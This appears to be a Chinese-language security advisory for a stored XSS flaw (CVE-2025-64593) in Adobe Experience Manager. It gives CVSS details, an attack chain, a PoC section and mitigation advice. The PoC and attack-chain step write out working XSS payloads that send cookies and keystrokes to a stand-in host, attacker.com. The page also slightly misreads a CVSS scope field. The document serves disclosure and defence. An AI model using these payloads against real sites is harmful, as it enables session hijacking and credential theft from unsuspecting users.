Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64593)

漏洞信息

漏洞编号

CVE-2025-64593

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

Adobe Experience Manager 6.5.23及之前版本存在存储型跨站脚本攻击(XSS)漏洞。该漏洞允许低权限攻击者在易受攻击的表单字段中注入恶意脚本。当受害者浏览包含该漏洞字段的页面时，恶意JavaScript代码会在受害者浏览器中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容，对用户和企业数据安全造成威胁。由于是存储型XSS，恶意脚本会持久保存在服务器端，所有访问该页面的用户都会受到攻击。

技术细节

该漏洞是存储型XSS，存在于Adobe Experience Manager的表单处理功能中。攻击者通过在表单输入字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），由于输入验证不充分，该恶意代码被存储在服务器数据库中。当其他用户访问包含该字段的页面时，服务器将存储的恶意代码与正常内容一起返回给用户浏览器，浏览器将其作为合法脚本执行。攻击条件：1)攻击者需拥有低权限账户；2)需找到存在输入验证缺陷的表单字段；3)诱导其他用户访问包含恶意内容的页面。CVSS向量显示攻击复杂度低(AC:L)，但需用户交互(UI:R)，且影响范围限于同源上下文(S:C)。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标Adobe Experience Manager实例，发现存在输入验证缺陷的表单字段

STEP 2

Initial Access

攻击者使用低权限账户登录Adobe Experience Manager系统

STEP 3

Payload Injection

在易受攻击的表单字段中注入恶意JavaScript代码，如<script>fetch('https://attacker.com/?c='+document.cookie)</script>

STEP 4

Persistence

恶意脚本被存储在服务器数据库中，持久化存在

STEP 5

Trigger

受害者访问包含恶意内容的页面，服务器返回包含恶意脚本的HTML

STEP 6

Execution

受害者浏览器执行恶意脚本，攻击者获取Cookie、会话令牌等敏感信息

STEP 7

Impact

攻击者利用窃取的凭证劫持用户会话、窃取数据或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64593 PoC: Stored XSS in Adobe Experience Manager Form Field -->

<!-- Step 1: Inject malicious script into vulnerable form field -->
<!-- Assumes attacker has low-privilege access to AEM content management -->

<!-- Example 1: Basic script injection -->
<script>alert('XSS - CVE-2025-64593')</script>

<!-- Example 2: Cookie stealing payload -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Example 3: Session hijacking payload -->
<img src=x onerror='fetch("https://attacker.com/log?data="+btoa(document.cookie))'>

<!-- Example 4: DOM-based keylogger -->
<script>document.addEventListener('keypress',function(e){new Image().src='https://attacker.com/klog?k='+e.key})</script>

<!-- Step 2: When victim views the page containing the injected field, the script executes -->
<!-- The malicious script runs in the victim's browser context -->

<!-- HTML form example showing where injection occurs -->
<!-- <form action="/content/forms/af/submit" method="POST">
     <input type="text" name="comments" value="[INJECTED SCRIPT HERE]" />
     <button type="submit">Submit</button>
   </form> -->

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

立即升级Adobe Experience Manager至6.5.24或更高版本以修复该漏洞。在等待补丁期间，可通过配置X-Frame-Options和Content-Security-Policy响应头来缓解风险，并对所有表单输入实施严格的HTML实体编码转义特殊字符。建议监控WAF日志中的可疑脚本注入行为，限制低权限用户对内容编辑功能的访问权限。